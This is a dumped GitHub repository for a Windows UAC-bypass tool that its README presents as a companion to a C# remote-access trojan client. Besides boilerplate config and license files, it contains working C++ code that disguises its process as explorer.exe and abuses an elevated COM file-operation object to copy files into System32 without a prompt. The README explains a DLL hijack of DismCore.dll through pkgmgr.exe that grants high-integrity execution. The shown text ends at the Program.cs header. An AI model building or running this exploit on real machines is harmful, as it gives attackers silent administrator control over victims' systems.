├── .gitattributes ├── .gitignore ├── Bypass UAC.sln ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── copyFile ├── Main.cpp ├── copyFile.vcxproj ├── copyFile.vcxproj.filters └── ntos.h ├── testAnything ├── App.config ├── Launcher.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── testDll ├── Main.cpp ├── dismCore.cpp ├── testDll.vcxproj └── testDll.vcxproj.filters └── unattend.xml /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | Compiled/ 15 | [Dd]ebug/ 16 | [Dd]ebugPublic/ 17 | [Rr]elease/ 18 | [Rr]eleases/ 19 | x64/ 20 | x86/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | [Ll]og/ 25 | 26 | # Visual Studio 2015 cache/options directory 27 | .vs/ 28 | # Uncomment if you have tasks that create the project's static files in wwwroot 29 | #wwwroot/ 30 | 31 | # MSTest test Results 32 | [Tt]est[Rr]esult*/ 33 | [Bb]uild[Ll]og.* 34 | 35 | # NUNIT 36 | *.VisualState.xml 37 | TestResult.xml 38 | 39 | # Build Results of an ATL Project 40 | [Dd]ebugPS/ 41 | [Rr]eleasePS/ 42 | dlldata.c 43 | 44 | # DNX 45 | project.lock.json 46 | project.fragment.lock.json 47 | artifacts/ 48 | 49 | *_i.c 50 | *_p.c 51 | *_i.h 52 | *.ilk 53 | *.meta 54 | *.obj 55 | *.pch 56 | *.pdb 57 | *.pgc 58 | *.pgd 59 | *.rsp 60 | *.sbr 61 | *.tlb 62 | *.tli 63 | *.tlh 64 | *.tmp 65 | *.tmp_proj 66 | *.log 67 | *.vspscc 68 | *.vssscc 69 | .builds 70 | *.pidb 71 | *.svclog 72 | *.scc 73 | 74 | # Chutzpah Test files 75 | _Chutzpah* 76 | 77 | # Visual C++ cache files 78 | ipch/ 79 | *.aps 80 | *.ncb 81 | *.opendb 82 | *.opensdf 83 | *.sdf 84 | *.cachefile 85 | *.VC.db 86 | *.VC.VC.opendb 87 | 88 | # Visual Studio profiler 89 | *.psess 90 | *.vsp 91 | *.vspx 92 | *.sap 93 | 94 | # TFS 2012 Local Workspace 95 | $tf/ 96 | 97 | # Guidance Automation Toolkit 98 | *.gpState 99 | 100 | # ReSharper is a .NET coding add-in 101 | _ReSharper*/ 102 | *.[Rr]e[Ss]harper 103 | *.DotSettings.user 104 | 105 | # JustCode is a .NET coding add-in 106 | .JustCode 107 | 108 | # TeamCity is a build add-in 109 | _TeamCity* 110 | 111 | # DotCover is a Code Coverage Tool 112 | *.dotCover 113 | 114 | # NCrunch 115 | _NCrunch_* 116 | .*crunch*.local.xml 117 | nCrunchTemp_* 118 | 119 | # MightyMoose 120 | *.mm.* 121 | AutoTest.Net/ 122 | 123 | # Web workbench (sass) 124 | 
.sass-cache/ 125 | 126 | # Installshield output folder 127 | [Ee]xpress/ 128 | 129 | # DocProject is a documentation generator add-in 130 | DocProject/buildhelp/ 131 | DocProject/Help/*.HxT 132 | DocProject/Help/*.HxC 133 | DocProject/Help/*.hhc 134 | DocProject/Help/*.hhk 135 | DocProject/Help/*.hhp 136 | DocProject/Help/Html2 137 | DocProject/Help/html 138 | 139 | # Click-Once directory 140 | publish/ 141 | 142 | # Publish Web Output 143 | *.[Pp]ublish.xml 144 | *.azurePubxml 145 | # TODO: Comment the next line if you want to checkin your web deploy settings 146 | # but database connection strings (with potential passwords) will be unencrypted 147 | #*.pubxml 148 | *.publishproj 149 | 150 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 151 | # checkin your Azure Web App publish settings, but sensitive information contained 152 | # in these scripts will be unencrypted 153 | PublishScripts/ 154 | 155 | # NuGet Packages 156 | *.nupkg 157 | # The packages folder can be ignored because of Package Restore 158 | **/packages/* 159 | # except build/, which is used as an MSBuild target. 
160 | !**/packages/build/ 161 | # Uncomment if necessary however generally it will be regenerated when needed 162 | #!**/packages/repositories.config 163 | # NuGet v3's project.json files produces more ignoreable files 164 | *.nuget.props 165 | *.nuget.targets 166 | 167 | # Microsoft Azure Build Output 168 | csx/ 169 | *.build.csdef 170 | 171 | # Microsoft Azure Emulator 172 | ecf/ 173 | rcf/ 174 | 175 | # Windows Store app package directories and files 176 | AppPackages/ 177 | BundleArtifacts/ 178 | Package.StoreAssociation.xml 179 | _pkginfo.txt 180 | 181 | # Visual Studio cache files 182 | # files ending in .cache can be ignored 183 | *.[Cc]ache 184 | # but keep track of directories ending in .cache 185 | !*.[Cc]ache/ 186 | 187 | # Others 188 | ClientBin/ 189 | ~$* 190 | *~ 191 | *.dbmdl 192 | *.dbproj.schemaview 193 | *.jfm 194 | *.pfx 195 | *.publishsettings 196 | node_modules/ 197 | orleans.codegen.cs 198 | 199 | # Since there are multiple workflows, uncomment next line to ignore bower_components 200 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 201 | #bower_components/ 202 | 203 | # RIA/Silverlight projects 204 | Generated_Code/ 205 | 206 | # Backup & report files from converting an old project file 207 | # to a newer Visual Studio version. 
Backup files are not needed, 208 | # because we have git ;-) 209 | _UpgradeReport_Files/ 210 | Backup*/ 211 | UpgradeLog*.XML 212 | UpgradeLog*.htm 213 | 214 | # SQL Server files 215 | *.mdf 216 | *.ldf 217 | 218 | # Business Intelligence projects 219 | *.rdl.data 220 | *.bim.layout 221 | *.bim_*.settings 222 | 223 | # Microsoft Fakes 224 | FakesAssemblies/ 225 | 226 | # GhostDoc plugin setting file 227 | *.GhostDoc.xml 228 | 229 | # Node.js Tools for Visual Studio 230 | .ntvs_analysis.dat 231 | 232 | # Visual Studio 6 build log 233 | *.plg 234 | 235 | # Visual Studio 6 workspace options file 236 | *.opt 237 | 238 | # Visual Studio LightSwitch build output 239 | **/*.HTMLClient/GeneratedArtifacts 240 | **/*.DesktopClient/GeneratedArtifacts 241 | **/*.DesktopClient/ModelManifest.xml 242 | **/*.Server/GeneratedArtifacts 243 | **/*.Server/ModelManifest.xml 244 | _Pvt_Extensions 245 | 246 | # Paket dependency manager 247 | .paket/paket.exe 248 | paket-files/ 249 | 250 | # FAKE - F# Make 251 | .fake/ 252 | 253 | # JetBrains Rider 254 | .idea/ 255 | *.sln.iml 256 | 257 | # CodeRush 258 | .cr/ 259 | 260 | # Python Tools for Visual Studio (PTVS) 261 | __pycache__/ 262 | *.pyc 263 | -------------------------------------------------------------------------------- /Bypass UAC.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26430.12 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testDll", "testDll\testDll.vcxproj", "{62DFCCF4-6642-4A86-861F-04E25A7CEFC5}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "copyFile", "copyFile\copyFile.vcxproj", "{046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Launcher", "testAnything\Launcher.csproj", "{56BAE5A3-B462-439F-ADF6-F98676A679C5}" 11 | 
EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|Any CPU = Release|Any CPU 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|Any CPU.ActiveCfg = Debug|Win32 23 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x64.ActiveCfg = Debug|x64 24 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x64.Build.0 = Debug|x64 25 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x86.ActiveCfg = Debug|Win32 26 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x86.Build.0 = Debug|Win32 27 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|Any CPU.ActiveCfg = Release|Win32 28 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x64.ActiveCfg = Release|x64 29 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x64.Build.0 = Release|x64 30 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x86.ActiveCfg = Release|Win32 31 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x86.Build.0 = Release|Win32 32 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|Any CPU.ActiveCfg = Debug|Win32 33 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x64.ActiveCfg = Debug|x64 34 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x64.Build.0 = Debug|x64 35 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x86.ActiveCfg = Debug|Win32 36 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x86.Build.0 = Debug|Win32 37 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|Any CPU.ActiveCfg = Release|Win32 38 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x64.ActiveCfg = Release|x64 39 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x64.Build.0 = Release|x64 40 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x86.ActiveCfg = Release|Win32 41 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x86.Build.0 = Release|Win32 42 | 
{56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 43 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|Any CPU.Build.0 = Debug|Any CPU 44 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x64.ActiveCfg = Debug|x64 45 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x64.Build.0 = Debug|x64 46 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x86.ActiveCfg = Debug|Any CPU 47 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x86.Build.0 = Debug|Any CPU 48 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|Any CPU.ActiveCfg = Release|Any CPU 49 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|Any CPU.Build.0 = Release|Any CPU 50 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x64.ActiveCfg = Release|x64 51 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x64.Build.0 = Release|x64 52 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x86.ActiveCfg = Release|Any CPU 53 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x86.Build.0 = Release|Any CPU 54 | EndGlobalSection 55 | GlobalSection(SolutionProperties) = preSolution 56 | HideSolutionNode = FALSE 57 | EndGlobalSection 58 | EndGlobal 59 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. 
6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 
34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at ghost@mcghost.ddns.net. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] 44 | 45 | [homepage]: http://contributor-covenant.org 46 | [version]: http://contributor-covenant.org/version/1/4/ 47 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contribution 2 | **Thank you for considering contribution to the UAC Bypass Project!** 3 | ## How to contribute? 4 | It's very simple! 5 | 1. Fork the project 6 | 2. Make the changes 7 | 3. Issue a pull request 8 | 4. I will do a merge after verifying (in some cases changing) the code 9 | ## How to report bugs? 10 | You can simply use the *Issues* section on github 11 | Just write an issue, and i will try to respond within 24 hours! 12 | ## How to contribute? (without writing code) 13 | You can also do this on the *Issues* section, and i will label it as *enhancement* 14 | This way you can suggest new features, or change an older one without coding. 15 | I will try to respond within 24 hours! 16 | ## How to run / compile 17 | I use Visual Studio 2017 Community Edition. 
18 | The c++ programs doesn't require .NET framework, the c\# Project is built with .NET Framework 4.5.2 19 | ## How to ask questions? 20 | You can also use the *Issues* section on GitHub, i will assign a label to it, so it's different from bugs. 21 | I will try to respond within 24 hours! 22 | You can also contact me at my [Youtube Channel](https://www.youtube.com/channel/UCYIOySp8zTTWJG5-n8wpZ2g) 23 | Either a comment on the video about the topic, or a message at the *Discussion* section on my channel page 24 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Advanced Hacker 101 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bypass UAC 2 | This project can bypass UAC on an administrator account with default UAC settings. 3 | The project contains snippets from the UACMe project by hfiref0x, but formatted to work with the [c# R.A.T Client](https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client) 4 | ## Disclaimer 5 | This application is for educational purposes only. 6 | Using this tool without understanding how it works can lead to negative consequences. 7 | I'm not responsible for the consequences of using this tool! 8 | Only run it on a computer you have permission to use! 9 | ## How it works 10 | The bypass has 2 main parts: 11 | 1. Copy a fake DLL to System32 12 | This can be done with IFileOperation 13 | 2. Execute the fake DLL with admin privileges 14 | pkgmgr.exe, when given the `/n:` option, calls Dism.exe, which has a DLL hijacking vulnerability 15 | pkgmgr is an auto-elevating .exe: it requires no UAC prompt or admin privileges, but runs at High integrity level (IL) 16 | The execution is done by running: `pkgmgr.exe /quiet /n:unattend.xml` 17 | After this, the High IL DLL executes the R.A.T client with admin privileges. Both steps are observable on the host: a DismCore.dll appearing in System32, and pkgmgr.exe being started with the `/n:` option. 18 | **testDll**: the fake DismCore.dll which will be copied to System32 19 | **testAnything**: a launcher, which executes the dll 20 | **copyFile**: copies a file to the destination, without the UAC prompt 21 | 22 | ## System requirements 23 | ### On 32 bit (x86) Machine 24 | **x86 Release** build of testDll 25 | **x86 Release** build of testAnything 26 | **x86 Release** build of copyFile 27 | ### On 64 bit (x64) Machine 28 | **x64 Release** build of testDll 29 | **x64 Release** build of testAnything 30 | **x64 Release** build of copyFile 31 | 32 | The tool was tested on a Windows 7 x64 machine. 33 | The source code in this form only works with the c# R.A.T client, but you can modify it for your own project 34 | ## More Information 
35 | You can read information related to contribution [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/CONTRIBUTING.md) 36 | You can read the Code of Conduct [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/CODE_OF_CONDUCT.md) 37 | You can view the project's licence [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/LICENSE) 38 | *Happy Coding* 39 | 40 | **-Advanced Hacking 101** 41 | -------------------------------------------------------------------------------- /copyFile/Main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "ntos.h" 6 | 7 | #define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}" 8 | static LPWSTR g_lpszExplorer = NULL; 9 | 10 | HRESULT elevateObject(void** fileOp) 11 | { 12 | HRESULT r = E_FAIL; 13 | BIND_OPTS3 bop; 14 | WCHAR szElevationMoniker[MAX_PATH]; 15 | DWORD dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER; 16 | 17 | RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker)); 18 | 19 | wcscpy(szElevationMoniker, L"Elevation:Administrator!new:"); 20 | wcscat(szElevationMoniker, T_CLSID_FileOperation); 21 | 22 | 23 | RtlSecureZeroMemory(&bop, sizeof(bop)); 24 | bop.cbStruct = sizeof(bop); 25 | bop.dwClassContext = dwClassContext; 26 | 27 | return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, IID_IFileOperation, fileOp); 28 | } 29 | 30 | VOID NTAPI supxLdrEnumModulesCallback(_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, _In_ PVOID Context, _In_ OUT BOOLEAN *StopEnumeration) 31 | { 32 | PPEB Peb = (PPEB)Context; 33 | 34 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 35 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer); 36 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 37 | *StopEnumeration = TRUE; 38 | } 39 | else { 40 | *StopEnumeration = FALSE; 41 | } 42 | } 43 | 44 | VOID 
elevateProcess() 45 | { 46 | DWORD cch; 47 | PPEB Peb = NtCurrentPeb(); 48 | SIZE_T sz; 49 | WCHAR szBuffer[MAX_PATH * 2]; 50 | 51 | RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); 52 | cch = GetWindowsDirectory(szBuffer, MAX_PATH); 53 | if ((cch != 0) && (cch < MAX_PATH)) { 54 | 55 | wcscat(szBuffer, L"\\"); 56 | wcscat(szBuffer, L"explorer.exe"); 57 | 58 | g_lpszExplorer = NULL; 59 | sz = 0x1000; 60 | NtAllocateVirtualMemory(NtCurrentProcess(), (void **)&g_lpszExplorer, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 61 | if (g_lpszExplorer) { 62 | wcscpy(g_lpszExplorer, szBuffer); 63 | 64 | RtlEnterCriticalSection(Peb->FastPebLock); 65 | 66 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer); 67 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, L"CustomString"); 68 | 69 | RtlLeaveCriticalSection(Peb->FastPebLock); 70 | 71 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 72 | } 73 | } 74 | } 75 | 76 | int wmain(int argc, wchar_t* argv[], wchar_t *envp[]) 77 | { 78 | 79 | //Check Argument Count 80 | 81 | if (argc != 3) //Because the first arg is always the program name 82 | { 83 | std::cout << "Argument count mismatch!" 
<< std::endl; 84 | return 1; 85 | } 86 | 87 | //Elevate Process 88 | 89 | elevateProcess(); 90 | 91 | //Define Vars 92 | 93 | LPWSTR sourceFile; 94 | LPWSTR destinationFile; 95 | IFileOperation *fileOperation; 96 | IShellItem *src, *dst; 97 | HRESULT result; 98 | DWORD OperationFlags; 99 | 100 | //Init vars 101 | 102 | result = E_FAIL; 103 | src = NULL; 104 | dst = NULL; 105 | fileOperation = NULL; 106 | OperationFlags = FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION; 107 | sourceFile = argv[1]; 108 | destinationFile = argv[2]; 109 | 110 | //Copy Operation 111 | result = CoInitialize(NULL); 112 | if (result != S_OK) return 1; 113 | std::cout << "COM Init Completed" << std::endl; 114 | result = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, IID_IFileOperation, (void **)&fileOperation); 115 | if (result != S_OK) return 1; 116 | std::cout << "Created COM Object" << std::endl; 117 | if (fileOperation != NULL) fileOperation->Release(); 118 | std::cout << "FileOp Released" << std::endl; 119 | result = elevateObject((void **)&fileOperation); 120 | if (result != S_OK || fileOperation == NULL) return 1; 121 | std::cout << "COM Object Elevated" << std::endl; 122 | fileOperation->SetOperationFlags(OperationFlags); 123 | std::cout << "Operation flags set" << std::endl; 124 | result = SHCreateItemFromParsingName(sourceFile, NULL, IID_IShellItem, (void **)&src); 125 | if (result != S_OK) return 1; 126 | std::cout << "Source shell item created" << std::endl; 127 | result = SHCreateItemFromParsingName(destinationFile, NULL, IID_IShellItem, (void **)&dst); 128 | if (result != S_OK) return 1; 129 | std::cout << "Destination shell item created" << std::endl; 130 | result = fileOperation->CopyItem(src, dst, NULL, NULL); 131 | if (result != S_OK) return 1; 132 | std::cout << "Copy operation scheduled" << std::endl; 133 | result = fileOperation->PerformOperations(); 
134 | if (result != S_OK) return 1; 135 | std::cout << "All operations performed" << std::endl; 136 | src->Release(); 137 | dst->Release(); 138 | src = NULL; 139 | dst = NULL; 140 | fileOperation->Release(); 141 | fileOperation = NULL; 142 | 143 | std::cout << "FileOp and Shell items released" << std::endl; 144 | //system("PAUSE"); Debugging purposes only 145 | 146 | return 0; 147 | } -------------------------------------------------------------------------------- /copyFile/copyFile.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E} 24 | Win32Proj 25 | copyFile 26 | 10.0.14393.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | 108 | 109 | 110 | 111 | Level3 112 | 113 | 114 | MaxSpeed 115 | true 116 | true 117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | 119 | 120 | Console 121 | true 122 | true 123 | %(AdditionalDependencies) 124 | 125 | 126 | 127 | 128 | Level3 129 | 130 | 131 | MaxSpeed 132 | true 133 | true 134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | 136 | 137 | Console 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 
| -------------------------------------------------------------------------------- /copyFile/copyFile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /testAnything/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /testAnything/Launcher.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {56BAE5A3-B462-439F-ADF6-F98676A679C5} 8 | Exe 9 | testAnything 10 | testAnything 11 | v4.5.2 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | true 36 | bin\x64\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x64 40 | prompt 41 | MinimumRecommendedRules.ruleset 42 | true 43 | 44 | 45 | bin\x64\Release\ 46 | TRACE 47 | true 48 | pdbonly 49 | x64 50 | prompt 51 | MinimumRecommendedRules.ruleset 52 | true 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /testAnything/Program.cs: 